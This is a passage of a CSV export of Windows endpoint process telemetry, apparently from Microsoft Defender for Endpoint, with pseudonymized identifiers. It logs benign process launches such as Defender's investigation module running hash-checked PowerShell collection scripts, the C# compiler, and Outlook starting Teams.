20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 03:02:13.749041400+00:00,11068,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""2624"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:02:24.032050500+00:00,2021-06-24 03:04:26.961526700+00:00,563cddf2-5a47-4fb4-8b2d-96517d5af20c,computerpii_0a470890c60768167990033d701e7bd881398861,173881,False,10.7740.19041.1052,False,11540474045176141,,11540474045176142,2021-06-24 03:02:13.749041400+00:00,11068,2021-06-24 03:02:13.749041400+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,11068,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-24 01:04:21.569195+00:00,2021-06-09 01:20:34.273470300+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,256.0,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
+1399,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 03:02:23.938167700+00:00,17264,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 03:02:23.879854+00:00,19732,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'bd8fdffb51c0651adc1ce2a6332eed22b69b77119c214ae0048e24e1342c27a0')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1' }""",True,2021-06-24 03:02:13.749041400+00:00,11068,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:02:24.032456100+00:00,2021-06-24 03:04:26.961603100+00:00,4ccdb502-4139-4a23-81b4-2f9fe1a89345,computerpii_0a470890c60768167990033d701e7bd881398861,173882,False,10.7740.19041.1052,False,11540474045176142,,11540474045176143,2021-06-24 03:02:23.879854+00:00,19732,2021-06-24 03:02:23.879854+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,19732,128,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+1400,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 03:02:27.521029100+00:00,14908,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\rhoziw3s.cmdline""",PortableExecutable,2019-12-07 09:10:35.992536100+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,2759232,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 03:02:23.879854+00:00,19732,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq 'bd8fdffb51c0651adc1ce2a6332eed22b69b77119c214ae0048e24e1342c27a0')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-075b1b75665454b124533865bb823596d0f0d475\FilePII_23541fc3fbf1ee28cf3cf93ab5359efb9a1260b0.ps1' }""",True,2021-06-24 03:02:13.749041400+00:00,11068,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:02:27.977901800+00:00,2021-06-24 03:04:26.964375300+00:00,5dccfb92-057d-47c7-92b7-e9ae1542d95f,computerpii_0a470890c60768167990033d701e7bd881398861,173911,False,10.7740.19041.1052,False,11540474045176142,,11540474045176145,2021-06-24 03:02:23.879854+00:00,19732,2021-06-24 03:02:23.879854+00:00,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,19732,18560,ActiveProcessStartkey,C:\Windows\System32\WindowsPowerShell\v1.0,452608,2037-06-10 07:45:25+00:00,2020-10-09 20:48:24.470101200+00:00,2021-06-24 00:54:33.592091900+00:00,2020-10-09 20:48:24.470101200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,256.0,,,,,,,,,Valid,OsVendor,Valid,OsVendorApplication,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler
+1401,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 03:02:27.626761200+00:00,4240,cvtres.exe,"cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 ""/OUT:C:\Windows\SERVIC~1\LOCALS~1\AppData\Local\Temp\FilePII_e0843ed9c4b657915946f8ee5ac9a7b1bd74ac86.tmp"" ""c:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\FilePII_10290e17b4a3cc489ad254822ace90b4a3c1ac36.TMP""",PortableExecutable,2019-12-07 09:10:36.196453400+00:00,C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe,52744,c877cbb966ea5939aa2a17b6a5160950,1fe531eac592b480aa4bd16052b909c3431434f17e7ae163d248355558ce43a6,2a3249732f5aa4588a4a9895ffe217355041d663,f65b029562077b648a6a5f6a1aa76a66,4a6d0864e19c0368a47217c129b075dddf61a6a262388f9d21045d82f3423ed7,528973416456c780051889ca1709510b6bf73370,S-1-5-19,NT AUTHORITY,LOCAL SERVICE,2021-06-24 03:02:27.521029100+00:00,14908,csc.exe,"""csc.exe"" /noconfig /fullpaths @""C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\rhoziw3s.cmdline""",True,2021-06-24 03:02:23.879854+00:00,19732,\Device\HarddiskVolume3\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 03:02:27.980021200+00:00,2021-06-24 03:04:26.964528400+00:00,b46d2176-73f1-4888-9633-392cf2fcf62c,computerpii_0a470890c60768167990033d701e7bd881398861,173913,False,10.7740.19041.1052,False,11540474045176145,,11540474045176146,2021-06-24 03:02:27.521029100+00:00,14908,2021-06-24 03:02:27.521029100+00:00,\Device\HarddiskVolume3\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe,14908,18560,TerminateProcessStartkey,C:\Windows\Microsoft.NET\Framework64\v4.0.30319,2759232,2019-11-24 09:26:27+00:00,2019-12-07 09:10:35.992536100+00:00,2021-06-24 00:59:44.006936100+00:00,2019-12-07 09:10:35.992536100+00:00,18560,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,997,997,False,,,,,,,,,,,Valid,OsVendorApplication,Valid,OsVendor,Microsoft Corporation,Microsoft® .NET Framework,4.8.4084.0,csc.exe,csc.exe,Visual C# Command Line Compiler,Microsoft Corporation,Microsoft® .NET Framework,14.10.25028.0,CVTRES.EXE,CVTRES.EXE,Microsoft® Resource File To COFF Object Conversion Utility
+1402,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 06:27:45.434652300+00:00,9468,SDXHelper.exe,"""SDXHelper.exe"" -Embedding",PortableExecutable,2021-06-12 08:57:27.853849200+00:00,C:\Program Files\Microsoft Office\root\Office16\SDXHelper.exe,141160,a8252d1f5f159884fd66ccd77e36e0e6,eadbb47e3d669ea39db848ba066a0b3ba226cf41cc6c62b166dd74d29007d63d,06833da5eaf54d97e885088d0a8385bee2c1f017,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 06:27:45.453978700+00:00,2021-06-23 06:29:36.375638300+00:00,e55219d0-9a34-4c99-808a-333173927bb6,computerpii_0a470890c60768167990033d701e7bd881398861,164002,False,10.7740.19041.1052,False,11540474045136908,,11540474045173833,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,388102317,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft Office,16.0.13801.20738,SDXHELPER,SDXHELPER.EXE,Microsoft Office SDX Helper
+1403,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 07:29:11.094198800+00:00,20808,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_MTk3MGE5MjAtMDc0Ny00NGE2LThlMmUtZGQwMmUwOTE1NGQ2%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22ca3be21a-a97f-4b69-ba2c-cd1749962d11%22%7d&launchAgent=outlook_protocol_launch""",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,553bf7f8c0e762a4c89b34bc6a1e8472,40d1ffbfc08e1c8fdbf1424840b87dc7f6b64cd8ab495a498aaf8cb0df715dc9,222ef0a57b2bb0eab87583daa000f1c8bca664b9,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 00:51:43.564026600+00:00,16176,OUTLOOK.EXE,"""OUTLOOK.EXE"" ",False,2021-06-23 00:51:19.951048300+00:00,11452,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:29:11.463854500+00:00,2021-06-23 07:30:54.773496+00:00,27265c63-dbe6-425b-a97f-585b4236072e,computerpii_0a470890c60768167990033d701e7bd881398861,165201,False,10.7740.19041.1052,False,11540474045171845,,11540474045174151,2021-06-23 00:51:43.564026600+00:00,16176,2021-06-23 00:51:43.564026600+00:00,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,16176,128,ActiveProcessStartkey,C:\Program Files\Microsoft Office\root\Office16,41367344,2021-06-03 12:43:37+00:00,2021-06-12 08:57:23.589811200+00:00,2021-06-23 00:51:43.826220200+00:00,2021-06-12 08:57:23.540503500+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,3073.0,1.0,20481.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Outlook,16.0.13801.20738,Outlook,Outlook.exe,Microsoft Outlook,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1404,False,Low,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-23 07:29:12.009651+00:00,14080,Teams.exe,"""Teams.exe"" --type=gpu-process --field-trial-handle=1720,18387531166145673451,17096294535217978832,131072 --enable-features=WebComponentsV0Enabled --disable-features=PictureInPicture,SpareRendererForSitePerProcess --electron-shared-settings=eyJ********** --gpu-preferences=KAAAAAAAAADgAAAwAAAAAAAAYAAAAAAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAFAAAAEAAAAAAAAAAAAAAABgAAABAAAAAAAAAAAQAAAAUAAAAQAAAAAAAAAAEAAAAGAAAA --mojo-platform-channel-handle=1740 --ignored="" --type=renderer "" /prefetch:2",PortableExecutable,2021-05-18 01:04:27.365665+00:00,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,104860976,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,23f71890129a077d846a3fcd41bf9d55,b18426f62797d6101be8fef1c1f69ce4383f40360f04974cfa196b68fe74687e,dd08a0f120a870170a8170542985fda2087391b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-23 07:29:11.094198800+00:00,20808,Teams.exe,"""Teams.exe"" ""msteams:https://teams.microsoft.com/l/meetup-join/19%3ameeting_MTk3MGE5MjAtMDc0Ny00NGE2LThlMmUtZGQwMmUwOTE1NGQ2%40thread.v2/0?context=%7b%22Tid%22%3a%22943328ec-ec10-48dc-8344-a281b9e5ac52%22%2c%22Oid%22%3a%22ca3be21a-a97f-4b69-ba2c-cd1749962d11%22%7d&launchAgent=outlook_protocol_launch""",False,2021-06-23 00:51:43.564026600+00:00,16176,\Device\HarddiskVolume3\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 07:29:12.043379200+00:00,2021-06-23 07:30:54.773568+00:00,10523883-bcbb-4faf-94ab-b4442728ee9d,computerpii_0a470890c60768167990033d701e7bd881398861,165202,False,10.7740.19041.1052,False,11540474045174151,,11540474045174152,2021-06-23 07:29:11.094198800+00:00,20808,2021-06-23 07:29:11.094198800+00:00,\Device\HarddiskVolume3\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current\Teams.exe,20808,16512,ActiveProcessStartkey,C:\Users\UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01\AppData\Local\Microsoft\Teams\current,104860976,2020-04-01 22:51:26+00:00,2021-05-18 01:04:31.750843800+00:00,2021-06-23 00:51:39.765150300+00:00,2021-05-18 01:04:27.365665+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,388102317,388102317,False,1.0,20481.0,,384.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams,Microsoft Corporation,Microsoft Teams,1.4.00.11161,Teams,Teams.exe,Microsoft Teams
+1405,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:37.445122500+00:00,7128,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""916"" ""eyJ**********""",PortableExecutable,2021-06-09 01:20:34.273470300+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,3851040,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:37.661610+00:00,2021-06-23 01:15:34.081093500+00:00,8921c59b-2d4c-44f8-951a-940e83348fdb,computerpii_0a470890c60768167990033d701e7bd881398861,156408,False,10.7740.19041.1052,False,11540474045137006,,11540474045172152,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,MsSense.exe,4916,256,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module
+1406,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:38.674406400+00:00,11560,SenseCncProxy.exe,876,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:39.677726600+00:00,2021-06-23 01:15:34.081133600+00:00,4d56d0d0-7218-4a1b-8e35-4cc33766e16a,computerpii_0a470890c60768167990033d701e7bd881398861,156409,False,10.7740.19041.1052,False,11540474045137006,,11540474045172153,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,18560,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+1407,True,System,S-1-5-19,LOCAL SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-23 01:13:47.559915900+00:00,12400,powershell.exe,"powershell.exe -ExecutionPolicy AllSigned -NoProfile -NonInteractive -Command ""& {$OutputEncoding = [Console]::OutputEncoding =[System.Text.Encoding]::UTF8;$scriptFileStream = [System.IO.File]::Open('C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1', [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileAccess]::Read);$calculatedHash = Get-FileHash 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' -Algorithm SHA256;if (!($calculatedHash.Hash -eq '1fa227bd0867edfce90eb510f261e723918795c6adcc290e0731f442391b58c3')) { exit 323;}; . 'C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection\7740.5699111.0.6126710.6079631-0c27616349e52cb22d9005508b93f4f593f7c390\FilePII_0c36505108f50e52b1b2c8c0e1e6368501a61293.ps1' }""",PortableExecutable,2020-10-09 20:48:24.470101200+00:00,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,452608,04029e121a0cfa5991749937dd22a1d9,9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f,f43d9bb316e30ae1a3494ac5b0624f6bea1bf054,a11f7b4a8b2803d3570d1016486d3ba8,dfe1329db9957ed24a8704049f159b285a027b049cf5412b30a9b3416981cdf1,e7f872448beb7fd702dac51c4e83b4f90be44155,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-23 01:13:37.445122500+00:00,7128,SenseIR.exe,"""SenseIR.exe"" ""OfflineSenseIR"" ""916"" ""eyJ**********""",True,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-23 01:13:47.588413100+00:00,2021-06-23 01:15:34.081238300+00:00,ee779c88-cf76-4e53-b31a-09eec105fe19,computerpii_0a470890c60768167990033d701e7bd881398861,156412,False,10.7740.19041.1052,False,11540474045172152,,11540474045172154,2021-06-23 01:13:37.445122500+00:00,7128,2021-06-23 01:13:37.445122500+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe,7128,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,3851040,2016-08-29 02:24:16+00:00,2021-06-09 01:20:34.374102900+00:00,2021-06-23 01:13:37.446959300+00:00,2021-06-09 01:20:34.273470300+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,997,False,,,,256.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1023,SenseIR.exe,SenseIR.exe,Windows Defender Advanced Threat Protection Sense IR module,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,POWERSHELL,PowerShell.EXE,Windows PowerShell
